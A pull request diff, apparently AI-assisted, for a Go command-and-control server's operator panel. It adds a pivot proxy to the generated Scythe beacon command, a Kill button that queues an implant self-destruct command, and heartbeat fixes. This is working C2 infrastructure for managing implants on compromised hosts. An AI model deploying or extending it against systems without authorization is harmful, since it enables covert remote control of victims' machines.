### PR TITLE
Admin: Scythe example layout, pivot proxy, and beacon kill; fix legac…

### DIFF
--- a/.env.example
+++ b/.env.example
@@ -18,3 +18,5 @@ ADMIN_BOOTSTRAP_PASSWORD=changeme
 
 # Shown in admin panel Scythe example (your machine -> published beacon port)
 BEACON_PUBLIC_BASE_URL=http://127.0.0.1:8080
+# Default Scythe --proxy host:port when a beacon has a parent (pivot); override per beacon via UI pivot_proxy
+# BEACON_PIVOT_PROXY=172.17.0.4:2222

--- a/README.md
+++ b/README.md
@@ -107,7 +107,8 @@ The process serves **two HTTP listeners**: the **beacon API** (implants / Scythe
 | `BEACON_ADDR` | Beacon API bind address (default `:8080`) |
 | `ADMIN_ADDR` | Admin panel bind address (default `:8443`) |
 | `ADMIN_BOOTSTRAP_USERNAME` / `ADMIN_BOOTSTRAP_PASSWORD` | If **no** operators exist in MongoDB, create the first account on startup (password stored as **Argon2id**). Omit to create operators manually in the `operators` collection. |
-| `BEACON_PUBLIC_BASE_URL` | Public base URL for Scythe examples (default `http://127.0.0.1:8080`). Set to your ingress URL in production. |
+| `BEACON_PUBLIC_BASE_URL` | Public base URL for Scythe examples (default `http://127.0.0.1:8080`, no path). Set to your ingress URL in production. |
+| `BEACON_PIVOT_PROXY` | Optional default `host:port` for Scythe `--proxy` when the beacon has a **parent** (pivot). Per-beacon override: **Pivot proxy** field or `pivot_proxy` in the generate API. |
 | `ADMIN_SESSION_TTL_HOURS` | Server-side session lifetime (default `168`). |
 | `ADMIN_COOKIE_SECURE` | Set to `true` if the admin UI is only served over HTTPS (adds `Secure` on session cookies). |
 | `ADMIN_DISABLE` | Set to `1` to run **only** the beacon listener (no admin port). |
@@ -121,7 +122,7 @@ Open `https://<host>:8443/beacons` (or `http://` locally; `/` redirects to **Bea
 
 | Area | Purpose |
 |------|---------|
-| **Beacons** | Generate clients (optional label, `ParentClientId` for pivot chain). Each generation **always saves a profile** in `beacon_profiles` (custom name or auto `beacon-xxxxxxxx-YYYYMMDD-hhmmss`). List/delete saved profiles. |
+| **Beacons** | Generate clients (optional label, `ParentClientId` for pivot chain, optional pivot proxy for Scythe). Each generation **always saves a profile** in `beacon_profiles` (custom name or auto `beacon-xxxxxxxx-YYYYMMDD-hhmmss`). List/delete saved profiles. |
 | **Reports** | Download JSON or CSV exports (redacted or full) for briefings. |
 | **Topology** | Graph of C2 → beacons (and parent → child when `ParentClientId` is set on a client). |
 | **Chat** | Operator messages stored in `operator_chat`. |
@@ -135,8 +136,10 @@ Open `https://<host>:8443/beacons` (or `http://` locally; `/` redirects to **Bea
 * Using a client, such as Scythe, we query the API
 
 ```
-$ ./Scythe Http --method GET --timeout 5s --url http://127.0.0.1:8080 --headers 'Content-Type:application/json,X-Client-Id: 550e8400-e29b-41d4-a716-446655440000,X-API-Secret: mysecurekey1' --directories '/heartbeat'
+$ ./Scythe Http --method GET --timeout 5s --url http://127.0.0.1:8080 --headers 'Content-Type:application/json,X-Client-Id:550e8400-e29b-41d4-a716-446655440000,X-API-Secret:mysecurekey1' --directories '/heartbeat/550e8400-e29b-41d4-a716-446655440000,/heartbeat'
 ```
+
+With a pivot (parent beacon), the example adds `--proxy <host:port>` (from the form, or `BEACON_PIVOT_PROXY`).
 
 * If there is no authenticated user, then no access.
 

--- a/pkg/adminpanel/handlers.go
+++ b/pkg/adminpanel/handlers.go
@@ -9,6 +9,7 @@ import (
 	"html/template"
 	"log"
 	"net/http"
+	"os"
 	"strings"
 	"time"
 
@@ -124,6 +125,8 @@ type createBeaconRequest struct {
 	ConnectionType string `json:"connection_type"`
 	ParentClientId string `json:"parent_client_id"`
 	Label          string `json:"label"`
+	// PivotProxy is host:port for Scythe --proxy when ParentClientId is set (e.g. 172.17.0.4:2222). Falls back to BEACON_PIVOT_PROXY.
+	PivotProxy string `json:"pivot_proxy,omitempty"`
 	// HeartbeatIntervalSec expected seconds between phone-homes (topology green/yellow/gray). Default 30.
 	HeartbeatIntervalSec int `json:"heartbeat_interval_sec"`
 	// ProfileName optional; if empty, server assigns a time-based name (profile is always saved).
@@ -177,15 +180,15 @@ func (s *Server) handleCreateBeacon(w http.ResponseWriter, r *http.Request) {
 	secret := hex.EncodeToString(secretBytes)
 
 	doc := dbconnections.BeaconClientDocument{
-		ClientId:               clientID,
-		Secret:                 secret,
-		Active:                 true,
-		ConnectionType:         req.ConnectionType,
-		HeartbeatIntervalSec:   hbSec,
-		ExpectedHeartBeat:      fmt.Sprintf("%ds", hbSec),
-		Commands:               []string{},
-		ParentClientId:         strings.TrimSpace(req.ParentClientId),
-		BeaconLabel:            strings.TrimSpace(req.Label),
+		ClientId:             clientID,
+		Secret:               secret,
+		Active:               true,
+		ConnectionType:       req.ConnectionType,
+		HeartbeatIntervalSec: hbSec,
+		ExpectedHeartBeat:    fmt.Sprintf("%ds", hbSec),
+		Commands:             []string{},
+		ParentClientId:       strings.TrimSpace(req.ParentClientId),
+		BeaconLabel:          strings.TrimSpace(req.Label),
 	}
 	ctx, cancel := context.WithTimeout(r.Context(), 10*time.Second)
 	defer cancel()
@@ -196,10 +199,12 @@ func (s *Server) handleCreateBeacon(w http.ResponseWriter, r *http.Request) {
 	}
 	base := beaconPublicBaseURL()
 	hURL := fmt.Sprintf("%s/heartbeat/%s", base, clientID)
-	scythe := fmt.Sprintf(
-		`Scythe Http --method GET --timeout %ds --url %q --headers 'Content-Type:application/json,X-Client-Id:%s,X-API-Secret:%s' --directories '/heartbeat'`,
-		hbSec, hURL, clientID, secret,
-	)
+	hasPivot := strings.TrimSpace(doc.ParentClientId) != ""
+	pivotProxy := strings.TrimSpace(req.PivotProxy)
+	if hasPivot && pivotProxy == "" {
+		pivotProxy = strings.TrimSpace(os.Getenv("BEACON_PIVOT_PROXY"))
+	}
+	scythe := buildScytheExample(base, clientID, secret, hbSec, hasPivot, pivotProxy)
 	profileName := strings.TrimSpace(req.ProfileName)
 	if profileName == "" {
 		profileName = defaultBeaconProfileName(clientID)
@@ -215,31 +220,42 @@ func (s *Server) handleCreateBeacon(w http.ResponseWriter, r *http.Request) {
 		ScytheExample:        scythe,
 		BeaconBaseURL:        base,
 		HeartbeatURL:         hURL,
+		PivotProxy:           pivotProxy,
 		CreatedBy:            user,
 	})
 	if profErr != nil {
 		log.Printf("admin: save profile: %v", profErr)
 	}
 	if aerr := dbconnections.InsertAuditLog(ctx, user, dbconnections.AuditActionBeaconCreated, bson.M{
-		"client_id":               clientID,
-		"profile_name":            profileName,
-		"connection_type":         req.ConnectionType,
-		"heartbeat_interval_sec":  hbSec,
-		"profile_saved_ok":        profErr == nil,
+		"client_id":              clientID,
+		"profile_name":           profileName,
+		"connection_type":        req.ConnectionType,
+		"heartbeat_interval_sec": hbSec,
+		"profile_saved_ok":       profErr == nil,
 	}); aerr != nil {
 		log.Printf("admin: audit log: %v", aerr)
 	}
 	resp := createBeaconResponse{
-		ClientID:        clientID,
-		Secret:          secret,
-		ProfileName:     profileName,
-		BeaconBaseURL:   base,
-		HeartbeatURL:    hURL,
-		ScytheExample:   scythe,
+		ClientID:           clientID,
+		Secret:             secret,
+		ProfileName:        profileName,
+		BeaconBaseURL:      base,
+		HeartbeatURL:       hURL,
+		ScytheExample:      scythe,
 		HeadersDescription: "Beacon middleware validates X-API-Secret against MongoDB; ClientId is in the URL path. X-Client-Id in headers is optional for your tooling.",
 	}
 	w.Header().Set("Content-Type", "application/json")
 	_ = json.NewEncoder(w).Encode(resp)
+}
+
+// buildScytheExample matches the Scythe CLI layout: base URL only; directories /heartbeat/<uuid> and /heartbeat; --proxy when pivoting.
+func buildScytheExample(baseURL, clientID, secret string, hbSec int, includeProxy bool, proxyHostPort string) string {
+	var proxyPart string
+	if includeProxy && strings.TrimSpace(proxyHostPort) != "" {
+		proxyPart = " --proxy " + strings.TrimSpace(proxyHostPort)
+	}
+	return fmt.Sprintf(`./Scythe Http --method GET%s --timeout %ds --url %q --headers 'Content-Type:application/json,X-Client-Id:%s,X-API-Secret:%s' --directories '/heartbeat/%s,/heartbeat'`,
+		proxyPart, hbSec, baseURL, clientID, secret, clientID)
 }
 
 func jsonError(w http.ResponseWriter, status int, msg string) {

--- a/pkg/adminpanel/handlers_commands.go
+++ b/pkg/adminpanel/handlers_commands.go
@@ -19,6 +19,9 @@ import (
 
 const maxQueuedCommandLen = 8000
 
+// beaconSelfDestructCommand is queued for Scythe to exit on next heartbeat delivery.
+const beaconSelfDestructCommand = "sendmetojesusdog"
+
 func beaconSelectLabel(c dbconnections.BeaconClientDocument) string {
 	label := strings.TrimSpace(c.BeaconLabel)
 	if label == "" {
@@ -303,4 +306,46 @@ func (s *Server) handleAPIBeaconCommandOutput(w http.ResponseWriter, r *http.Req
 		"client_id": clientID,
 		"entries":   entries,
 	})
+}
+
+type beaconKillRequest struct {
+	ClientID string `json:"client_id"`
+}
+
+func (s *Server) handleAPIBeaconKill(w http.ResponseWriter, r *http.Request) {
+	actor, _, ok := s.sessionUser(r)
+	if !ok {
+		jsonError(w, http.StatusUnauthorized, "unauthorized")
+		return
+	}
+	var req beaconKillRequest
+	if err := json.NewDecoder(r.Body).Decode(&req); err != nil {
+		jsonError(w, http.StatusBadRequest, "invalid json")
+		return
+	}
+	req.ClientID = strings.TrimSpace(req.ClientID)
+	if req.ClientID == "" {
+		jsonError(w, http.StatusBadRequest, "client_id required")
+		return
+	}
+	ctx, cancel := context.WithTimeout(r.Context(), 10*time.Second)
+	defer cancel()
+	err := dbconnections.AppendBeaconCommands(ctx, req.ClientID, []string{beaconSelfDestructCommand})
+	if err != nil {
+		if err == mongo.ErrNoDocuments {
+			jsonError(w, http.StatusNotFound, "beacon not found")
+			return
+		}
+		log.Printf("admin: beacon kill queue: %v", err)
+		jsonError(w, http.StatusInternalServerError, "queue failed")
+		return
+	}
+	if err := dbconnections.InsertAuditLog(ctx, actor, dbconnections.AuditActionBeaconKillQueued, bson.M{
+		"client_id": req.ClientID,
+		"command":   beaconSelfDestructCommand,
+	}); err != nil {
+		log.Printf("admin: audit beacon kill: %v", err)
+	}
+	w.Header().Set("Content-Type", "application/json")
+	_ = json.NewEncoder(w).Encode(map[string]string{"status": "queued", "command": beaconSelfDestructCommand})
 }

--- a/pkg/adminpanel/handlers_portal.go
+++ b/pkg/adminpanel/handlers_portal.go
@@ -94,6 +94,11 @@ func (s *Server) handleBeaconsPage(w http.ResponseWriter, r *http.Request) {
 			rows.WriteString(template.HTMLEscapeString(p.ParentClientID))
 			rows.WriteString(`</div></div>`)
 		}
+		if p.PivotProxy != "" {
+			rows.WriteString(`<div class="creds-row"><div class="creds-label">Pivot proxy</div><div class="mono">`)
+			rows.WriteString(template.HTMLEscapeString(p.PivotProxy))
+			rows.WriteString(`</div></div>`)
+		}
 		if p.HeartbeatIntervalSec > 0 {
 			rows.WriteString(`<div class="creds-row"><div class="creds-label">Expected interval (s)</div><div class="mono">`)
 			rows.WriteString(strconv.Itoa(p.HeartbeatIntervalSec))
@@ -116,7 +121,9 @@ func (s *Server) handleBeaconsPage(w http.ResponseWriter, r *http.Request) {
 		rows.WriteString(`</pre><button type="button" class="btn-tiny" onclick="copyBeaconField('`)
 		rows.WriteString(idScythe)
 		rows.WriteString(`')">Copy</button></div>`)
-		rows.WriteString(`</div></details><button type="button" class="btn btn-secondary" data-del="`)
+		rows.WriteString(`</div></details><button type="button" class="btn btn-kill" data-kill="`)
+		rows.WriteString(template.HTMLEscapeString(p.ClientID))
+		rows.WriteString(`">Kill</button><button type="button" class="btn btn-secondary" data-del="`)
 		rows.WriteString(pid)
 		rows.WriteString("\">Delete</button></div></td></tr>")
 	}
@@ -126,13 +133,15 @@ func (s *Server) handleBeaconsPage(w http.ResponseWriter, r *http.Request) {
 
 	body := `
 <h1>Beacons</h1>
-<p class="muted">Generate a <code>clients</code> row and optionally save a named profile for reuse and exports.</p>
+<p class="muted">Generate a <code>clients</code> row and optionally save a named profile for reuse and exports. <strong>Kill</strong> queues the Scythe self-destruct command on the next heartbeat.</p>
 <div class="card">
   <h2>Generate</h2>
   <label>Display label (topology / reports)</label>
   <input id="lbl" placeholder="e.g. HR-workstation-04">
   <label>Parent beacon ClientId (optional, for pivot chain)</label>
   <input id="par" placeholder="UUID of upstream beacon" class="mono">
+  <label>Pivot proxy host:port (optional; used in Scythe <code>--proxy</code> when parent is set; or set env <code>BEACON_PIVOT_PROXY</code>)</label>
+  <input id="pivproxy" placeholder="e.g. 172.17.0.4:2222" class="mono">
   <label>Expected phone-home interval (seconds)</label>
   <input id="hbsec" type="number" min="5" max="86400" value="30" title="Green while check-ins stay within this window; yellow after a missed interval (see Topology).">
   <label>Profile name (optional)</label>
@@ -153,6 +162,8 @@ document.getElementById('gen').onclick = async function() {
   out.style.display = 'block';
   out.textContent = '…';
   var body = { connection_type: 'HTTP', label: document.getElementById('lbl').value.trim(), parent_client_id: document.getElementById('par').value.trim() };
+  var ppx = document.getElementById('pivproxy').value.trim();
+  if (ppx) body.pivot_proxy = ppx;
   var hbn = parseInt(document.getElementById('hbsec').value, 10);
   if (!isNaN(hbn) && hbn >= 5) body.heartbeat_interval_sec = hbn;
   var pn = document.getElementById('pname').value.trim();
@@ -183,6 +194,16 @@ function copyBeaconFallback(text) {
   try { document.execCommand('copy'); } catch (e) {}
   document.body.removeChild(ta);
 }
+document.querySelectorAll('[data-kill]').forEach(function(btn) {
+  btn.onclick = async function() {
+    if (!confirm('Queue self-destruct for this beacon? The command sendmetojesusdog will run on the next check-in.')) return;
+    var cid = btn.getAttribute('data-kill');
+    var r = await fetch('/api/beacon-kill', { method: 'POST', credentials: 'same-origin', headers: { 'Content-Type': 'application/json' }, body: JSON.stringify({ client_id: cid }) });
+    var j = await r.json().catch(function() { return {}; });
+    if (r.ok) alert('Kill command queued.');
+    else alert(j.error || r.statusText || 'Failed');
+  };
+});
 document.querySelectorAll('[data-del]').forEach(function(btn) {
   btn.onclick = async function() {
     if (!confirm('Delete this profile?')) return;

--- a/pkg/adminpanel/server.go
+++ b/pkg/adminpanel/server.go
@@ -33,6 +33,7 @@ func NewServer() *Server {
 	s.router.HandleFunc("/api/beacon-profiles/{id}", s.handleAPIBeaconProfileDelete).Methods(http.MethodDelete)
 	s.router.HandleFunc("/api/beacon-commands", s.handleAPIBeaconCommands).Methods(http.MethodGet, http.MethodPost)
 	s.router.HandleFunc("/api/beacon-command-output", s.handleAPIBeaconCommandOutput).Methods(http.MethodGet)
+	s.router.HandleFunc("/api/beacon-kill", s.handleAPIBeaconKill).Methods(http.MethodPost)
 	s.router.HandleFunc("/api/users", s.handleAPICreateUser).Methods(http.MethodPost)
 	s.router.HandleFunc("/api/logs/export", s.handleAPIAuditExport).Methods(http.MethodGet)
 	s.router.HandleFunc("/api/logs", s.handleAPIAuditLogsJSON).Methods(http.MethodGet)

--- a/pkg/adminpanel/ui.go
+++ b/pkg/adminpanel/ui.go
@@ -63,6 +63,8 @@ input, select, textarea { width: 100%; max-width: 32rem; margin-top: .25rem; pad
 textarea { min-height: 4rem; max-width: 100%; }
 button.btn { cursor: pointer; padding: .5rem 1rem; border-radius: 6px; border: 1px solid #2ea043; background: var(--green); color: #fff; font-weight: 600; margin-top: .75rem; }
 button.btn-secondary { border-color: var(--border); background: #21262d; color: var(--text); }
+button.btn-kill { border-color: #f85149; background: #da3633; color: #fff; font-weight: 600; }
+button.btn-kill:hover { background: #b62324; border-color: #ff7b72; }
 table { width: 100%; border-collapse: collapse; font-size: .9rem; }
 th, td { text-align: left; padding: .5rem .6rem; border-bottom: 1px solid var(--border); }
 th { color: var(--muted); font-weight: 600; }

--- a/pkg/apiserver/apiserver.go
+++ b/pkg/apiserver/apiserver.go
@@ -13,6 +13,7 @@ import (
 
 	"github.com/gorilla/mux"
 	"go.mongodb.org/mongo-driver/bson"
+	"go.mongodb.org/mongo-driver/mongo"
 )
 
 // Setting endpoints as a constant
@@ -118,6 +119,11 @@ func HandleFetchData(w http.ResponseWriter, r *http.Request) {
 func HandleHeartBeat(w http.ResponseWriter, r *http.Request) {
 	result, err := dbconnections.FetchHeartbeat()
 	if err != nil {
+		if err == mongo.ErrNoDocuments {
+			// Legacy collection may be empty; Scythe still polls plain /heartbeat when listed in --directories.
+			JsonResponse(w, http.StatusOK, map[string]string{"status": "ok"})
+			return
+		}
 		log.Println("Error fetching heartbeat:", err)
 		http.Error(w, `{"error": "Failed to fetch heartbeat"}`, http.StatusInternalServerError)
 		return
@@ -126,7 +132,7 @@ func HandleHeartBeat(w http.ResponseWriter, r *http.Request) {
 	// Extract only the "status" field
 	status, ok := result["status"].(string)
 	if !ok {
-		http.Error(w, "Invalid data format", http.StatusInternalServerError)
+		JsonResponse(w, http.StatusOK, map[string]string{"status": "ok"})
 		return
 	}
 

--- a/pkg/dbconnections/audit.go
+++ b/pkg/dbconnections/audit.go
@@ -14,12 +14,13 @@ const collectionAuditLogs = "audit_logs"
 
 // Audit action names (portal audit trail).
 const (
-	AuditActionBeaconCreated     = "beacon_created"
-	AuditActionUserCreated       = "user_created"
-	AuditActionReportExported    = "report_exported"
-	AuditActionBeaconProfileDel     = "beacon_profile_deleted"
-	AuditActionAuditLogExported     = "audit_log_exported"
-	AuditActionBeaconCommandQueued  = "beacon_command_queued"
+	AuditActionBeaconCreated       = "beacon_created"
+	AuditActionUserCreated         = "user_created"
+	AuditActionReportExported      = "report_exported"
+	AuditActionBeaconProfileDel    = "beacon_profile_deleted"
+	AuditActionAuditLogExported    = "audit_log_exported"
+	AuditActionBeaconCommandQueued = "beacon_command_queued"
+	AuditActionBeaconKillQueued    = "beacon_kill_queued"
 )
 
 // AuditLogsCollection stores operator/C2 portal audit events.

--- a/pkg/dbconnections/portal.go
+++ b/pkg/dbconnections/portal.go
@@ -23,19 +23,20 @@ var OperatorChatCollection *mongo.Collection
 
 // BeaconProfile is a saved beacon profile (for reuse and reporting).
 type BeaconProfile struct {
-	ID               primitive.ObjectID `bson:"_id,omitempty"`
-	Name             string             `bson:"name"`
-	ClientID         string             `bson:"client_id"`
-	Secret           string             `bson:"secret"`
-	ConnectionType   string             `bson:"connection_type"`
-	ParentClientID   string             `bson:"parent_client_id,omitempty"`
-	Label                 string `bson:"label,omitempty"`
-	HeartbeatIntervalSec  int    `bson:"heartbeat_interval_sec,omitempty"`
-	ScytheExample         string `bson:"scythe_example"`
-	BeaconBaseURL    string             `bson:"beacon_base_url"`
-	HeartbeatURL     string             `bson:"heartbeat_url"`
-	CreatedAt        time.Time          `bson:"created_at"`
-	CreatedBy        string             `bson:"created_by"`
+	ID                   primitive.ObjectID `bson:"_id,omitempty"`
+	Name                 string             `bson:"name"`
+	ClientID             string             `bson:"client_id"`
+	Secret               string             `bson:"secret"`
+	ConnectionType       string             `bson:"connection_type"`
+	ParentClientID       string             `bson:"parent_client_id,omitempty"`
+	PivotProxy           string             `bson:"pivot_proxy,omitempty"`
+	Label                string             `bson:"label,omitempty"`
+	HeartbeatIntervalSec int                `bson:"heartbeat_interval_sec,omitempty"`
+	ScytheExample        string             `bson:"scythe_example"`
+	BeaconBaseURL        string             `bson:"beacon_base_url"`
+	HeartbeatURL         string             `bson:"heartbeat_url"`
+	CreatedAt            time.Time          `bson:"created_at"`
+	CreatedBy            string             `bson:"created_by"`
 }
 
 // ChatMessage is one operator chat line.


### PR DESCRIPTION
…y GET /heartbeat

- Generate Scythe lines as ./Scythe with --url base only, --directories /heartbeat/<clientId>,/heartbeat, and optional --proxy when a parent is set.
- Add pivot_proxy on beacon create and BEACON_PIVOT_PROXY env fallback; persist on beacon_profiles; document in README and .env.example.
- Add red Kill on Beacons profiles and POST /api/beacon-kill queuing sendmetojesusdog with audit beacon_kill_queued.
- Return 200 for legacy GET /heartbeat when the heartbeat collection is empty or lacks status so Scythe directory polls do not fail.

Made-with: Cursor